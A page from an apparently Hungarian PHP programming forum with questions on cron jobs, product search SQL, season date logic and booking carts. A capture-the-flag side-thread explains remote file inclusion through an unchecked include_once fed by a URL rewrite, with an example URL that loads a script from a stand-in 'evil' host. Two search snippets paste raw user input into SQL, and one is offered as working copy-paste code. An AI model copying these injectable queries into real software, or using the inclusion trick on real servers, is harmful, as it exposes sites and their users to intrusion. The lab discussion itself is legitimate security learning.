- MasterDeeJay: Noname 1TB-os SATA SSD teszt
- sziku69: Fűzzük össze a szavakat :)
- f(x)=exp(x): A laposföld elmebaj: Vissza a jövőbe!
- Luck Dragon: Asszociációs játék. :)
- eBay-es kütyük kis pénzért
- Négymagos Xeon(!) CPU LGA775-ös deszkában
- bambano: Bambanő háza tája
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- erkxt: A Roidmi becsődölt – és senki nem szól egy szót sem?
- hcl: Kelj fel komám, ne aludjál
Új hozzászólás Aktív témák
-
DNReNTi
őstag
-
DNReNTi
őstag
válasz
alpihun
#18746
üzenetére
Windowson nem lehet cronjobokat beallitani, de az elkepzelheto, hogy van ra valami 3rd party tool. Ettol fuggetlenul, en inkabb a linuxos kornyezetet javasolnam. Az idozitett hatterfolyamat pedig nem framework fuggo, tehat tok mindegy, hogy Laravel, vagy Codeigniter, vagy akarmi.
-
-
alpihun
senior tag
Halik.
Egy szövegalapú böngészős játékot írok (mint a sárkányölő pl) és akárhogy kerülgetem szerveridős matekezéssel meg mindenféle megoldásokkal, szükségem lenne arra, hogy tudjak dolgokat előre meghatározott időnként auto megcsinálni, pl cselekvéslimit, shop kínálatfrissítés stb..
Mire van ezekhez szükségem?ui: wampserverrel dolgozom w10en
-
Hello,
Hülye kérdés.
Linuxon futtatok egy shell scriptet PHP-ból. A kimenetét hogyan tudom/hogyan érdemes elkapni, hogy tudjam formázni?
Gondolom ha a script kimenetében HTML tageket generálok, az nem lesz értelmezve.
Köszi bármilyen ötletet
-
biker
nagyúr
válasz
Vision
#18739
üzenetére
nem szép, de ez is működő megoldás, ha saját főből kell írni.
Persze pdo-val még szebb lenne.
Persze indexelt táblán, mert különben 10-20mp is lehet egy 100.000 soros táblában 3-4 szóra keresni.Aztán ezért lehet megköveznek, mert ez még mysql_* féle megoldás volt, de én mondjuk a match-against párossal keresnék, mert akkor a rendezést lehet score alapján végezni, mennyire releváns az összetett keresés
$termekek = mysql_query("SELECT *, MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST ('$keresett*' IN BOOLEAN MODE) AS score FROM webshop_termekek WHERE MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST('$keresett*' IN BOOLEAN MODE) ORDER BY $order LIMIT {$_POST['start']},$lapozas");ez egy működő copypaste
és nem kell ciklusban összefűzni a szavakat. -
#18737
PumpkinSeed
addikt
Vision
#18736
PumpkinSeed
addikt
-
Következő kérdés: ti hogy implementálnátok egy jó kereső logikát? Én eddig string konkatenációt használtam több keresőszó esetén és azt toltam be adatbázisba.
Tegyük fel, hogy van egy termékeket taralmazó adatbázisom műszaki cikkeknek. A keresést nyilván szótártáblákra futtatom, a kapcsolat most mindegy. Legyen márkanév, típus, megnevezés tábla és ugyanezzel a névvel mezők.
$sql = "SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes WHERE 1=1"
foreach($keresoszavak as $keresoszo){
$sql .= "AND (markanev LIKE '%".$keresoszo."%' OR tipus LIKE '%".$keresoszo."%' OR megnevezes LIKE '%".$keresoszo."%')"
}Ez csak egy példa, nyilván mindenki ismeri. Biztos van ennél kulturáltabb módszer, ti mire esküsztök?
(#18737) PumpkinSeed
Az kimaradt, hogy osztott tárhelyes LAMP környezetben.
-
zeix
senior tag
Igen, mert csak hónap és nap van megadva. Év nincs megadva a szezon változóiban.
Azt ki kell számolni, hogy a jelenlegi dátum a tavalyi év szezon kezdet és az idei év szezonvég között van-e.
pl kezdet:09-01 vég:04-01 a jelenlegi dátum pedig 10-01. de lehet 01-01 is. Ilyenkor kell a tavalyi év 09-01-et venni kezdetnek. -
zeix
senior tag
Sziasztok!
A segítségeteket szeretném kérni, hogy jól működik-e a script amit írtam, mert már kezdek belekeveredni.
Szerintem jó, de lehet kihagytam valamit, vagy egyszerűbben is meglehet oldani.
A lényeg hogy két dátum (hónap, nap) között döntse el a program, hogy beleesik-e az adott időpont, a két dátum közé, vagy nem.
$ev = '2017';
//$ev = date("Y");
$mostdatum = strtotime("2017-10-05");
//$mostdatum = strtotime("now");
$szezonkezdet='09-01';
$szezonveg='05-30';
$eveleje = strtotime($ev."-01-01");
$evvege = strtotime($ev."-12-31");
$datum1 = date($ev."-".$szezonkezdet);
$datum2 = date($ev."-".$szezonveg);
$ezevszezonkezdet = strtotime($datum1);
$ezevszezonveg = strtotime($datum2);
if ($mostdatum >= $eveleje AND $mostdatum <= $ezevszezonveg)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}
if ($mostdatum >= $ezevszezonveg AND $mostdatum <= $ezevszezonkezdet)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}
if ($mostdatum >= $ezevszezonkezdet AND $mostdatum <= $evvege)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2."+1 year");
}
if ($mostdatum <= $ezevszezonkezdet AND $mostdatum >= $ezevszezonveg)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2);
}
echo date('Y-m-d', $time1);
echo '<br>';
echo date('Y-m-d', $mostdatum);
echo '<br>';
echo date('Y-m-d', $time2);
if ($mostdatum > $time1 AND $mostdatum < $time2)//szezon
{
echo 'ok';
}
else
{
echo 'error';
} -
#18731
fordfairlane
veterán
Vision
#18729
fordfairlane
veterán
válasz
Vision
#18729
üzenetére
Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).
Én még nem csináltam ilyen rendszert, ahol így kellett kezelni a kosarat, de így elsőre jónak tűnik.
-
Ti hogyan valósítanátok meg egy foglalási rendszer kosarát? Nekem csak az jut eszembe, hogy nem sessionben tárolom a tételeket, hanem adatbázisban, és így on the fly leveszi polcról, ha valaki más megnézni.
(#18730) fordfairlane
Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).
-
MacCaine
őstag
válasz
sztanozs
#18715
üzenetére
Egy változóban van egy string (alkönyvtár), amihez hozzáfűz egy másik stringet (fájlnév). Ezt a második stringet tudom változtatni és beírogatni más fájlneveket, elérési utakat. Ha meg tudnám csinálni, hogy egy scriptet is lefuttasson, akkor a .htaccess kiíratása lenne az utolsó gondolatom.
(#18716) DNReNTi
A "/root/capture_the_flag.txt" file tartalma.
Nincsenek adatok, fájlok, ez egy kifejezetten erre a célra létrehozott vbox image. -
disy68
aktív tag
válasz
MacCaine
#18710
üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
'); -
MacCaine
őstag
Mert php-ben van a webapp.
(#18707) DNReNTi
SQLi nem kellett, a webapp már megadta magát, a session lopás is megvolt. XSS az kicsit más tészta.
(#18708) disy68
Eljutottam valameddig, és a továbblépéshez kellene a php-s segítség. LFI megy, RFI nem, ezt kellene megoldanom valahogy. Vagy valami guru megmondja, hogy ez így nem lehetséges php-ben, és akkor keresek valami más sebezhetőséget.
(#18709) Zedz
Jó az ötlet.
-
disy68
aktív tag
válasz
MacCaine
#18705
üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról. -
DNReNTi
őstag
válasz
MacCaine
#18705
üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit. -
-
disy68
aktív tag
-
DNReNTi
őstag
válasz
MacCaine
#18700
üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen.
Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat.
De ha lenne ilyen topik, en olvasgatnam.
Ejnye.Új hozzászólás Aktív témák
- Friss koncepciót hoz a Nothing Phone (3)
- Samsung Galaxy S24 Ultra - ha működik, ne változtass!
- Azonnali mobilos kérdések órája
- Synology NAS
- Fúziós energiát vásárol a Google
- Futás, futópályák
- Milyen TV-t vegyek?
- Gyúrósok ide!
- A fociról könnyedén, egy baráti társaságban
- A Nothing Headphone (1) is a dizájnról szól
- További aktív témák...
- iKing.Hu - Xiaomi 14 Ultra - Ultra White - Használt, karcmentes
- Azonnali készpénzes Intel i3 i5 i7 i9 8xxx 9xxx processzor felvásárlás személyesen / csomagküldés
- Akciós dokkolók, Lenovo Legion Pro 7 RTX 4080/4090 laptopok, licencek, antivírusok
- Eredeti Lenovo USB-C 65W töltő
- Lenovo ThinkPad 40AF docking station (DisplayLink)
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest
Cég: PC Trade Systems Kft.
Város: Szeged